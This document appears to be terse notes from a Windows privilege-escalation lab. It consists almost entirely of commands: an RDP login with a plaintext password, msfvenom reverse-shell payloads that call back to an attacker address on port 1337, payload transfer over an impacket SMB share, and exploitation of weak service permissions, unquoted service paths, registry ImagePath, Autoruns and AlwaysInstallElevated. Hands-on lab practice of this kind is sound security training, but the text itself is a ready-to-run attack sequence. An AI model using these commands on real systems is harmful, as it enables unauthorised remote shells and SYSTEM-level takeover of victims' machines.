initial access with xfreerdp
xfreerdp3 /u:user /p:password321 /cert:ignore /v:10.201.8.171payload generation with msfvenom and transfer with impacket
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.110.172 LPORT=1337 -f exe -o rev.exemsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.14.110.172 LPORT=1337 -f msi -o rev.msismbserver.py root .copy \\10.14.110.172\root\rev.msi C:\PrivEsc\rev.exe
copy \\10.14.110.172\root\rev.msi C:\PrivEsc\rev.msiservice exploits
insecure service perms
Unquoted service path
weak registry perms
insecure service executables
registry
Autoruns
AlwaysInstallElevated
sc config filepermsvc binpath= "\"C:\PrivEsc\rev.exe\""accesschk.exe -quvwd "C:\Program Files\Unquoted Path Service"reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\rev.exe /fC:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"copy C:\PrivEsc\rev.exe "C:\Program Files\Autorun Program\program.exe" /Ymsiexec /quiet /qn /i C:\PrivEsc\rev.msi